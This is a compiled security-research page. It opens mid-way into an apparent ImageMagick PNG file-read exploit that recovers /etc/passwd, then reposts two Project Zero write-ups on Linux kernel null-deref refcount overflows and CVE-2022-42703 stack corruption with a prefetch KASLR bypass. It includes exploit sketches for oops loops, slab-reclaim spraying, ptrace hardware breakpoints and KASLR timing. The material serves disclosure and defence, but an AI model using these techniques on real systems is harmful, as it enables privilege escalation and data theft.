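    body = png[pos + 8:pos + 8 + length]
    if ctype == b"zTXt":
        keyword, rest = body.split(b"\x00", 1)
        body = keyword + b"\x00" + zlib.decompress(rest[1:])  # skip method byte
    if ctype in (b"tEXt", b"zTXt") and b"Raw profile" in body:
        # Payload layout: keyword, then "\n<name>\n<length>\n<hex lines...>"
        hex_blob = b"".join(body.split(b"\n")[3:])
        print(bytes.fromhex(hex_blob.decode()).decode(errors="replace"))
    pos += 8 + length + 4  # chunk header + data + CRC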

Evidence:

Content of the /etc/passwd stored in the image via profile->datum variable:

Hexadecimal representation of the /etc/passwd content, extracted from the image:

Content from /etc/passwd in the website, received in the image generated:

Video showing the exploitation:

Exploiting null-dereferences in the Linux kernel

Original text by Seth Jenkins, Project Zero

For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.

Kernel oops overview

At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops — instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred — however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.

The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.

Reference count mismanagement overview

Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 2^32 times.

Example null-deref bug

When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example — an otherwise unrelated bug I coincidentally discovered in the very recent past:

static int show_smaps_rollup(struct seq_file *m, void *v)
{
        struct proc_maps_private *priv = m->private;
        struct mem_size_stats mss;
        struct mm_struct *mm;
        struct vm_area_struct *vma;
        unsigned long last_vma_end = 0;
        int ret = 0;
        priv->task = get_proc_task(priv->inode); //task reference taken
        if (!priv->task)
                return -ESRCH;
        mm = priv->mm; //With no vma's, mm->mmap is NULL
        if (!mm || !mmget_not_zero(mm)) { //mm reference taken
                ret = -ESRCH;
                goto out_put_task;
        }
        memset(&mss, 0, sizeof(mss));
        ret = mmap_read_lock_killable(mm); //mmap read lock taken
        if (ret)
                goto out_put_mm;
        hold_task_mempolicy(priv);
        for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {
                smap_gather_stats(vma, &mss);
                last_vma_end = vma->vm_end;
        }
        show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here
        seq_pad(m, ' ');
        seq_puts(m, "[rollup]\n");
        __show_smap(m, &mss, true);
        release_task_mempolicy(priv);
        mmap_read_unlock(mm);
out_put_mm:
        mmput(mm);
out_put_task:
        put_task_struct(priv->task);
        priv->task = NULL;
        return ret;
}

This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMAs mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply reading /proc/[pid]/smaps_rollup for a task with no VMAs (which itself can be stably created via ptrace):

This kernel oops will mean that the following events occur:

  1. The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
  2. The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
  3. The task struct associated with the smaps_rollup file will have a refcount leaked
  4. The mm_struct’s mm_users refcount associated with the task will be leaked
  5. The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)

Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of events 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4. 


The mm_users refcount still uses an overflow-unsafe atomic_t and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple important roadblocks we need to avoid in order to repeatedly leak this refcount:

  1. We cannot call this syscall from the task with the empty vma list itself — in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
  2. We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
  3. If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM
  4. We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.

Our final refcount leaking overflow strategy is as follows:

  1. Process A forks a process B
  2. Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
  3. Process B clones with CLONE_VM | CLONE_PTRACE another process C
  4. Process B munmap’s its entire virtual memory address space — this also unmaps process C’s virtual memory address space.
  5. Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
  6. (D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
  7. Process A goes back to step 5 ~2^32 times

The above strategy can be rearchitected to run in parallel (across processes, not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 2^32 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.
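To make the loop concrete, here is a minimal sketch of the oops-generation core (steps 5 through 7), assuming processes B and C have already been set up as described; it is an illustration, not the author’s PoC:

import os
import sys

def oops_once(target_pid: int) -> None:
    # Each read oopses in show_smaps_rollup and kills the reader, so it must
    # happen in a disposable, single-threaded child (process D or E).
    pid = os.fork()
    if pid == 0:
        # Child: a fresh open avoids the permanently locked seq_file mutex;
        # the read never returns, and the oops leaks one mm_users reference.
        with open(f"/proc/{target_pid}/smaps_rollup", "rb") as f:
            f.read()
        os._exit(0)  # unreachable on a vulnerable kernel
    os.waitpid(pid, 0)

# Alternate between the two CLONE_VM tasks (B and C) so their task_struct
# refcounts grow half as fast as the shared mm_users refcount.
pid_b, pid_c = int(sys.argv[1]), int(sys.argv[2])
for i in range(2**32):
    oops_once(pid_b if i % 2 == 0 else pid_c)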

Exploitation

Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:

static inline void __mmput(struct mm_struct *mm)
{
        VM_BUG_ON(atomic_read(&mm->mm_users));
        uprobe_clear_state(mm);
        exit_aio(mm);
        ksm_exit(mm);
        khugepaged_exit(mm);
        exit_mmap(mm);
        mm_put_huge_zero_page(mm);
        set_mm_exe_file(mm, NULL);
        if (!list_empty(&mm->mmlist)) {
                spin_lock(&mmlist_lock);
                list_del(&mm->mmlist);
                spin_unlock(&mmlist_lock);
        }
        if (mm->binfmt)
                module_put(mm->binfmt->module);
        lru_gen_del_mm(mm);
        mmdrop(mm);
}

Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.

However, before the call permanently deadlocks, it will call several other functions:

  1. uprobe_clear_state
  2. exit_aio
  3. ksm_exit
  4. khugepaged_exit

Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.

This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:

void exit_aio(struct mm_struct *mm)
{
        struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
        struct ctx_rq_wait wait;
        int i, skipped;
        if (!table)
                return;
        atomic_set(&wait.count, table->nr);
        init_completion(&wait.comp);
        skipped = 0;
        for (i = 0; i < table->nr; ++i) {
                struct kioctx *ctx =
                rcu_dereference_protected(table->table[i], true);
                if (!ctx) {
                        skipped++;
                        continue;
                }
                ctx->mmap_size = 0;
                kill_ioctx(mm, ctx, &wait);
        }
        if (!atomic_sub_and_test(skipped, &wait.count)) {
                /* Wait until all IO for the context are done. */
                wait_for_completion(&wait.comp);
        }
        RCU_INIT_POINTER(mm->ioctx_table, NULL);
        kfree(table);
}

While the callee function kill_ioctx is written in such a way to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:

Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.

Conclusion

While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.

Exploiting CVE-2022-42703 — Bringing back the stack attack

Original text by Seth Jenkins, Project Zero

This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 — Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel’s memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is and the commit that introduced the bug are great resources in order to gain additional context.

Setting the scene

Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. madvise(…, MADV_PAGEOUT) can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():

struct anon_vma *folio_lock_anon_vma_read(struct folio *folio,
					  struct rmap_walk_control *rwc)
{
	struct anon_vma *anon_vma = NULL;
	struct anon_vma *root_anon_vma;
	unsigned long anon_mapping;

	rcu_read_lock();
	anon_mapping = (unsigned long)READ_ONCE(folio->mapping);
	if ((anon_mapping & PAGE_MAPPING_FLAGS) != PAGE_MAPPING_ANON)
		goto out;
	if (!folio_mapped(folio))
		goto out;

	// anon_vma is dangling pointer
	anon_vma = (struct anon_vma *) (anon_mapping - PAGE_MAPPING_ANON);
	// root_anon_vma is read from dangling pointer
	root_anon_vma = READ_ONCE(anon_vma->root);
	if (down_read_trylock(&root_anon_vma->rwsem)) {
[...]
		if (!folio_mapped(folio)) { // false
[...]
		}
		goto out;
	}

	if (rwc && rwc->try_lock) { // true
		anon_vma = NULL;
		rwc->contended = true;
		goto out;
	}
[...]
out:
	rcu_read_unlock();
	return anon_vma; // return dangling pointer
}

One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.

Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker-controlled memory.
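
A minimal sketch of the reclaim step, with an illustrative spray width and the fake anon_vma field layout elided:

/*
 * Hypothetical sketch: reclaim the freed anon_vma slab page with
 * attacker-controlled data. Each page-sized pipe write makes the kernel
 * back the pipe buffer with a fresh page from the page allocator, which
 * can reclaim the page we just freed. Spray width is illustrative.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NR_PIPES  256		/* arbitrary spray width */
#define PAGE_SZ   0x1000

int main(void)
{
	static int fds[NR_PIPES][2];
	char page[PAGE_SZ];

	/*
	 * Fill the page with fake anon_vma contents; the ->root field of
	 * each fake object would point at the address we want
	 * down_read_trylock() to operate on (offsets omitted here).
	 */
	memset(page, 0x41, sizeof(page));

	for (int i = 0; i < NR_PIPES; i++) {
		if (pipe(fds[i]) < 0) {
			perror("pipe");
			exit(1);
		}
		if (write(fds[i][1], page, sizeof(page)) != sizeof(page)) {
			perror("write");
			exit(1);
		}
	}
	pause();
	return 0;
}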

At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:

struct rw_semaphore {
	atomic_long_t count;
	atomic_long_t owner;
	struct optimistic_spin_queue osq; /* spinner MCS lock */
	raw_spinlock_t wait_lock;
	struct list_head wait_list;
};

...

static inline int __down_read_trylock(struct rw_semaphore *sem)
{
	long tmp;

	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);

	tmp = atomic_long_read(&sem->count);
	while (!(tmp & RWSEM_READ_FAILED_MASK)) {
		if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
						    tmp + RWSEM_READER_BIAS)) {
			rwsem_set_reader_owned(sem);
			return 1;
		}
	}
	return 0;
}

It was helpful to emulate down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer, and we cannot modify any non-8-byte-aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.
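
To make those constraints concrete, here is a small userspace model of the fast path (the mask and bias values reflect my reading of the upstream definitions):

/*
 * Userspace model (not kernel code) of the __down_read_trylock() fast
 * path: the target value gains 0x100 only if its three low bits and its
 * most significant bit are all clear.
 */
#include <stdint.h>
#include <stdio.h>

#define RWSEM_READER_BIAS	0x100UL
/* writer-locked | waiters | handoff | read-fail (sign) bits */
#define RWSEM_READ_FAILED_MASK	(0x7UL | (1UL << 63))

static int fake_down_read_trylock(uint64_t *count)
{
	uint64_t tmp = *count;

	if (tmp & RWSEM_READ_FAILED_MASK)
		return 0;			/* no write performed */
	*count = tmp + RWSEM_READER_BIAS;	/* the constrained add */
	return 1;
}

int main(void)
{
	uint64_t saved_len  = 0x10;			/* aligned, MSB clear */
	uint64_t kernel_ptr = 0xffff888012345678UL;	/* MSB set: rejected */

	printf("len: ok=%d now 0x%lx\n",
	       fake_down_read_trylock(&saved_len), (unsigned long)saved_len);
	printf("ptr: ok=%d still 0x%lx\n",
	       fake_down_read_trylock(&kernel_ptr), (unsigned long)kernel_ptr);
	return 0;
}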

Stack corruption…

On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. A brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack — except in that case, kernel GPR’s are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.

One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.

Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After corrupting this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns back to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.

…begets stack corruption

The attack strategy starts as follows:

  1. Fork a process Y from process X.
  2. Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.
  3. Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state (see the sketch after this list).
  4. Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which holds the saved length of process Y’s copy_to_user call.
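
A hypothetical sketch of steps 1 through 3, with illustrative debug-register encodings (the real exploit’s plumbing is more involved):

/*
 * Hypothetical sketch: the parent (process X) sets a hardware write
 * breakpoint on the child's uname(2) destination buffer via the x86
 * debug registers; the child (process Y) then hammers uname(2) so
 * copy_to_user() keeps hitting the watchpoint in kernel mode.
 */
#include <signal.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <unistd.h>

static struct utsname target_buf;	/* the watched address [addr] */

int main(void)
{
	pid_t child = fork();

	if (child == 0) {	/* process Y */
		ptrace(PTRACE_TRACEME, 0, NULL, NULL);
		raise(SIGSTOP);	/* wait for the watchpoint install */
		for (;;)
			uname(&target_buf);	/* copy_to_user() -> #DB */
	}

	/* process X */
	waitpid(child, NULL, 0);

	/* DR0 = watched address */
	ptrace(PTRACE_POKEUSER, child,
	       offsetof(struct user, u_debugreg[0]), &target_buf);
	/* DR7: local-enable slot 0 (bit 0), type=write (1), len=8 (2) */
	ptrace(PTRACE_POKEUSER, child,
	       offsetof(struct user, u_debugreg[7]),
	       (1UL << 0) | (1UL << 16) | (2UL << 18));
	ptrace(PTRACE_CONT, child, NULL, NULL);

	/*
	 * Keep the child running: each watchpoint hit stops it with
	 * SIGTRAP. Step 4 (spamming the arbitrary write at the saved
	 * rcx slot) would run concurrently from another task.
	 */
	for (;;) {
		waitpid(child, NULL, 0);
		ptrace(PTRACE_CONT, child, NULL, NULL);
	}
}
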

The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack-data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.

Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we induce the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivial to bypass both mitigations and overwrite the return address.

Completing a ROP chain for the kernel is left as an exercise to the reader.

Fetching the KASLR slide with prefetch

Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. 6 years ago, Daniel Gruss et al. discovered a new, more reliable technique for exploiting the TLB timing side channel in x86 CPUs. Their results demonstrated that prefetch instructions executed in user mode retire with statistically significant latency differences depending on whether the requested virtual address to be prefetched is mapped versus unmapped, even if that virtual address is only mapped in kernel mode. kPTI was helpful in mitigating this side channel; however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thus kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern x86 CPUs.

There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.

Implementation

The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.
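
A minimal sketch of that primitive, using lfence-serialized rdtsc reads around a single prefetcht0:

/*
 * Hypothetical sketch of the timing primitive: time one prefetch of a
 * candidate kernel address, serialized with lfence rather than cpuid
 * (which is emulated in VM environments).
 */
#include <stdint.h>

static inline uint64_t rdtsc_serialized(void)
{
	uint32_t lo, hi;

	asm volatile("lfence\n\trdtsc\n\tlfence"
		     : "=a"(lo), "=d"(hi) : : "memory");
	return ((uint64_t)hi << 32) | lo;
}

static inline uint64_t time_prefetch(const void *addr)
{
	uint64_t t0 = rdtsc_serialized();

	asm volatile("prefetcht0 (%0)" : : "r"(addr) : "memory");
	return rdtsc_serialized() - t0;
}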

Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analysis. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code, which finds the precise address at which prefetch dramatically drops in run-time. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address.
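
A sketch of the low-resolution scan under those assumptions (the base and step constants are illustrative; time_prefetch() is the primitive from the previous sketch):

/*
 * Hypothetical sketch: take the minimum of a handful of prefetch
 * timings for each of the 512 candidate 2 MiB slots in the kernel text
 * range; the mapped slot stands out as a sharp drop. Base and step are
 * illustrative assumptions about the x86-64 kernel text KASLR range.
 */
#include <stdint.h>
#include <stdio.h>

#define KASLR_BASE	0xffffffff80000000UL	/* assumed range start */
#define KASLR_STEP	0x200000UL		/* assumed 2 MiB granularity */
#define KASLR_SLOTS	512
#define SAMPLES		16

uint64_t time_prefetch(const void *addr);	/* see previous sketch */

int main(void)
{
	uint64_t best = UINT64_MAX;
	int best_slot = 0;

	for (int slot = 0; slot < KASLR_SLOTS; slot++) {
		const void *addr = (const void *)(KASLR_BASE + slot * KASLR_STEP);
		uint64_t min = UINT64_MAX;

		for (int s = 0; s < SAMPLES; s++) {
			uint64_t t = time_prefetch(addr);

			if (t < min)
				min = t;	/* min filters interrupt/SMI noise */
		}
		if (min < best) {
			best = min;
			best_slot = slot;
		}
	}
	printf("likely kernel base: 0x%lx\n",
	       (unsigned long)(KASLR_BASE + best_slot * KASLR_STEP));
	return 0;
}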

This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Zijlstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue: KASLR is comprehensively compromised on x86 against local attackers, has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.

Conclusion

This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.